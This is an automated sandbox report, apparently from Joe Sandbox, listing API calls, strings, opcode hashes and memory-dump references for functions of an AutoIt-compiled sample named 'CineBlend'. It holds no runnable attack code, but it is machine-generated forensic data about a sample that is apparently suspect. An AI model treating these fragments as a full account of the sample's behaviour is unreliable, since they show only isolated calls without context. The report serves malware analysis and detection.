                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B46299
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_wcslen
                                          • String ID: Line %d: $AutoIt -
                                          • API String ID: 2289894680-4094128768
                                          • Opcode ID: ae95062539471e333de9d8e39f5c9a8197c3a74dbd3d9fc18398e36c0194c622
                                          • Instruction ID: 6f655d6ef4887cefda077a1efdae41cd46dfe92d4f9c6a78f2dc83eafe0dfae3
                                          • Opcode Fuzzy Hash: ae95062539471e333de9d8e39f5c9a8197c3a74dbd3d9fc18398e36c0194c622
                                          • Instruction Fuzzy Hash: 97416E71408204AAC721EB60EC85FDFB7ECEF55320F0046AAF599921A1EF749749DB93
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B458BE,SwapMouseButtons,00000004,?), ref: 00B458EF
                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B458BE,SwapMouseButtons,00000004,?), ref: 00B45910
                                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B458BE,SwapMouseButtons,00000004,?), ref: 00B45932
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: a1cc18050eee60a6c6d2c38eaff413cceca92051551a0fa900b519f415c889d0
                                          • Instruction ID: 73ea4134f3d07c4ed2cd78e070bf757d11270735e75d244ffb10a3051bec8df7
                                          • Opcode Fuzzy Hash: a1cc18050eee60a6c6d2c38eaff413cceca92051551a0fa900b519f415c889d0
                                          • Instruction Fuzzy Hash: FD113C75511A18FFDB218F64DC84EAEBBF8EF45760F108499F845E7210E631AF41A760
                                          Strings
                                          • Variable must be of type 'Object'., xrefs: 00B948C6
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable must be of type 'Object'.
                                          • API String ID: 0-109567571
                                          • Opcode ID: 1b2265374f3f3ce7ab1be0ec97f4412b862ca6c3b8456b17bae91f8748acd92b
                                          • Instruction ID: 7fe97499db4c0d1f813160f2c55b6166169637aa2ebd8354af532b85ea3e7e30
                                          • Opcode Fuzzy Hash: 1b2265374f3f3ce7ab1be0ec97f4412b862ca6c3b8456b17bae91f8748acd92b
                                          • Instruction Fuzzy Hash: A6C25A71A00216DFCB24DF58C880BBDB7F1FF09314F2481A9E945AB2A1D775AE42DB91
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00B609D8
                                            • Part of subcall function 00B63614: RaiseException.KERNEL32(?,?,?,00B609FA,76F82E40,?,?,?,?,?,?,?,00B609FA,?,00C09758), ref: 00B63674
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00B609F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: Unknown exception
                                          • API String ID: 3476068407-410509341
                                          • Opcode ID: 474b0e70e31f18306eb44497adb42b9b709aaf7af70f7bc15f04ceef9daa927b
                                          • Instruction ID: 7a9f5c4a384f32db2bd03298ae35bf6fdbdbf7f05dcc5faebe6dc6d0b84b1248
                                          • Opcode Fuzzy Hash: 474b0e70e31f18306eb44497adb42b9b709aaf7af70f7bc15f04ceef9daa927b
                                          • Instruction Fuzzy Hash: 3AF0C23492020DB7CF10BAAEDC4699F77EC9E01754B6041F0F924A65E2FBB8EA55C6D0
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00BC8D52
                                          • TerminateProcess.KERNEL32(00000000), ref: 00BC8D59
                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00BC8F3A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFreeLibraryTerminate
                                          • String ID:
                                          • API String ID: 146820519-0
                                          • Opcode ID: 722ab1783c3781367724aedc48a1cac3e461d3efe5c56c78198caa229a8e4388
                                          • Instruction ID: 4188a93236cc07d3e247491d88537994faacb8a511fb96d0ec2fae2fa03d7a3e
                                          • Opcode Fuzzy Hash: 722ab1783c3781367724aedc48a1cac3e461d3efe5c56c78198caa229a8e4388
                                          • Instruction Fuzzy Hash: 84126971A083019FD714DF28C484F6ABBE5FF88314F14899DE8899B292DB71ED45CB92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$_strcat
                                          • String ID:
                                          • API String ID: 306214811-0
                                          • Opcode ID: 1fec322f13d26338a43be47cfb09121694f2dfad55bf252cdb2469ac50517257
                                          • Instruction ID: 0311da1f04b988773ae00a0131b375d8fb1b6d5ecc51813dbc2038545a20390b
                                          • Opcode Fuzzy Hash: 1fec322f13d26338a43be47cfb09121694f2dfad55bf252cdb2469ac50517257
                                          • Instruction Fuzzy Hash: 77A17A31604605EFDB18DF18C5D5A6ABBE1FF45314B2084EDE81A9F292DB31EE42CB80
                                          APIs
                                          • CloseHandle.KERNELBASE(00000000,00000000,?,?,00B7894C,?,00C09CE8,0000000C), ref: 00B78A84
                                          • GetLastError.KERNEL32(?,00B7894C,?,00C09CE8,0000000C), ref: 00B78A8E
                                          • __dosmaperr.LIBCMT ref: 00B78AB9
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          • Opcode ID: 3939306e216388d733e63a09602f357e95524f69e491787e4a107cde3541992b
                                          • Instruction ID: 6cdf1596baf20b22e8005a4d80748592016b84eccdc61c162040c69422f7a392
                                          • Opcode Fuzzy Hash: 3939306e216388d733e63a09602f357e95524f69e491787e4a107cde3541992b
                                          • Instruction Fuzzy Hash: D00126326465A05AC6346278AC8EB7E67C9CB82734F2982DBF93C8F1D2DF708D814590
                                          APIs
                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B797BA,FF8BC369,00000000,00000002,00000000), ref: 00B79744
                                          • GetLastError.KERNEL32(?,00B797BA,FF8BC369,00000000,00000002,00000000,?,00B75ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B66F41), ref: 00B7974E
                                          • __dosmaperr.LIBCMT ref: 00B79755
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer__dosmaperr
                                          • String ID:
                                          • API String ID: 2336955059-0
                                          • Opcode ID: 373a23d11199043c34098d93ad12c36f5ee0d6f03df969a64bc521060bd2fe81
                                          • Instruction ID: 2f88f269f4b47d0aae3afa5bc3d7bafca7f8356b641c925245fd4a196f5eb609
                                          • Opcode Fuzzy Hash: 373a23d11199043c34098d93ad12c36f5ee0d6f03df969a64bc521060bd2fe81
                                          • Instruction Fuzzy Hash: 5D014C33720515ABCB199F99EC45CAE7BA9EB85330B284289F8359B190EB70DD41CB90
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,00BB0B03,00000000,?,00000000,?,00B83A00,00000000), ref: 00BB0D2E
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00BB0B03,00000000,?,00000000,?,00B83A00,00000000), ref: 00BB0D36
                                          • DuplicateHandle.KERNELBASE(00000000,?,00BB0B03,00000000,?,00000000,?,00B83A00,00000000), ref: 00BB0D3D
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CurrentProcess$DuplicateHandle
                                          • String ID:
                                          • API String ID: 1294930198-0
                                          • Opcode ID: 01f28bd5ad458d67052b22985c725202b565b75f0b639958488d55240b32a95e
                                          • Instruction ID: 7c653816df1b5ea57810feee097c3920fd4a8882324d1f2c8d4489196b987129
                                          • Opcode Fuzzy Hash: 01f28bd5ad458d67052b22985c725202b565b75f0b639958488d55240b32a95e
                                          • Instruction Fuzzy Hash: CED05E77151305BBC7022BD9EC19F7BBBBCEBC6B32F10406AFA4997190AEB094009625
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00B53006
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: CALL
                                          • API String ID: 1385522511-4196123274
                                          • Opcode ID: 401844581af15d520bc29da13aba720ca45f51a5cf47e9332d8c4f595372f584
                                          • Instruction ID: b419957e556399d2b6da4ad9fa286cef67fcbbcf618ff85f45f6ad8ca851e4c2
                                          • Opcode Fuzzy Hash: 401844581af15d520bc29da13aba720ca45f51a5cf47e9332d8c4f595372f584
                                          • Instruction Fuzzy Hash: EC2268706082419FC714DF24C885B2ABBF1FF89314F1489EDE8959B3A1DB71E949CB82
                                          APIs
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00B8413B
                                            • Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871
                                            • Part of subcall function 00B43A57: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B43A76
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen
                                          • String ID: X
                                          • API String ID: 779396738-3081909835
                                          • Opcode ID: bd4d1a1eaba048944a9814dbe593b7fdfcce4cd3c96489f7192230a8307f836a
                                          • Instruction ID: 07cbdc4548602ca91afc7d061eb31d34a3fad33af7475ae3681d2fb36aa574b1
                                          • Opcode Fuzzy Hash: bd4d1a1eaba048944a9814dbe593b7fdfcce4cd3c96489f7192230a8307f836a
                                          • Instruction Fuzzy Hash: DC21AE71A002589BCF01DF94C805BEE7BFCAF49314F008099E545A7281DBB89A89DFA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleMode
                                          • String ID:
                                          • API String ID: 3953868439-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 75c16c936857e82661a5e5b1b043bf322daf43ff0fbe2cb48048a69e9463c761
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: A431D271A10109DFC718EF5AD490A6AFBE6FB59300B2486E5E409CB652D73AEDC1CBC0
                                          APIs
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B43A3C
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_
                                          • String ID:
                                          • API String ID: 1144537725-0
                                          • Opcode ID: 2e6bc64f8ac1311f155fe784a2b56346a595beb44481e891080408423c0d7bae
                                          • Instruction ID: 8e2c24ec3dc250cb3c3e402a5a5f4bd8925b4fa689368193d750fd22f3788ddd
                                          • Opcode Fuzzy Hash: 2e6bc64f8ac1311f155fe784a2b56346a595beb44481e891080408423c0d7bae
                                          • Instruction Fuzzy Hash: 6831A5705047018FE720DF24D8847DBBBE8FB49718F04096EF6DA87251E775AA58CB52
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00B74F04
                                          • GetFileType.KERNELBASE(00000000), ref: 00B74F16
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID:
                                          • API String ID: 3000768030-0
                                          • Opcode ID: 235f419cd6c6260150ac23f7224d7c67fc5766651e980e3cbc8e9919c01a0f90
                                          • Instruction ID: fe7ee7218ee33ee235d9b5d2620f7d7a65154fd945d1355c35a54f4e8f411f48
                                          • Opcode Fuzzy Hash: 235f419cd6c6260150ac23f7224d7c67fc5766651e980e3cbc8e9919c01a0f90
                                          • Instruction Fuzzy Hash: 1711B1311087518AC7348A3D9C88622AAD4EB97332F39879AD5BFCB5F1C734D9829241
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00B83A00,00000000), ref: 00BB0AEC
                                          • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00BB0B0E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                          • String ID:
                                          • API String ID: 4104817828-0
                                          • Opcode ID: 2a482d4259e38cc0cbc92c9f6e3b0f2947ab1d0fb6241637c5a5c9ef41bd1356
                                          • Instruction ID: 0d5a6ae00e5e50556fc7c5e707276a97a41efe0352c98b6db8a8781788fbedf2
                                          • Opcode Fuzzy Hash: 2a482d4259e38cc0cbc92c9f6e3b0f2947ab1d0fb6241637c5a5c9ef41bd1356
                                          • Instruction Fuzzy Hash: C6F012B16017059BC320AF5AD9448A7FBECFF94720B40882EE58687A60DBB4B085CB90
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00B4333D
                                            • Part of subcall function 00B432E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B432FB
                                            • Part of subcall function 00B432E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B43312
                                            • Part of subcall function 00B4338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B43368,?), ref: 00B433BB
                                            • Part of subcall function 00B4338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B43368,?), ref: 00B433CE
                                            • Part of subcall function 00B4338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C12418,00C12400,?,?,?,?,?,?,00B43368,?), ref: 00B4343A
                                            • Part of subcall function 00B4338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B434BB
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00B43377
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                          • String ID:
                                          • API String ID: 1550534281-0
                                          • Opcode ID: 452e4d230a10bf847ca0b43c05e5b7f9e6f3ba74c665a6fe912a428f2edfdbf4
                                          • Instruction ID: fbef2a17a1c02f3d57a50a4844121f1ca77ac885fea6ca9e84190dadcf5c9a1b
                                          • Opcode Fuzzy Hash: 452e4d230a10bf847ca0b43c05e5b7f9e6f3ba74c665a6fe912a428f2edfdbf4
                                          • Instruction Fuzzy Hash: CEF05E35558344AFE710AF60EC0BBA877D8B706B09F44889AB519861F2DFBA86609B44
                                          APIs
                                            • Part of subcall function 00BB1312: InterlockedExchange.KERNEL32(?,?), ref: 00BB1322
                                            • Part of subcall function 00BB1312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00BB1334
                                            • Part of subcall function 00BB1312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00BB1342
                                            • Part of subcall function 00BB1312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00BB1350
                                            • Part of subcall function 00BB1312: CloseHandle.KERNEL32(00000000), ref: 00BB135F
                                            • Part of subcall function 00BB1312: InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB136F
                                            • Part of subcall function 00BB1312: LeaveCriticalSection.KERNEL32(00000000), ref: 00BB1376
                                          • CloseHandle.KERNELBASE(?,?,00BB0BBF), ref: 00BB0B5D
                                          • DeleteCriticalSection.KERNEL32(?,?,00BB0BBF), ref: 00BB0B83
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 2929296749-0
                                          • Opcode ID: 1c267c07e1f3fc4507c179c987c1b0f18e8a89de832b1508037f0e60bd57ff68
                                          • Instruction ID: fb185222eeba62d3629d3eded78818c125ef389fea6e6740898a5949314b71bc
                                          • Opcode Fuzzy Hash: 1c267c07e1f3fc4507c179c987c1b0f18e8a89de832b1508037f0e60bd57ff68
                                          • Instruction Fuzzy Hash: D9E01A32025601ABC7303F65EC05AA6FBE4BF04321F20889EF19A56831DBB4A8848B08
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00B4CEEE
                                          Memory Dump Source
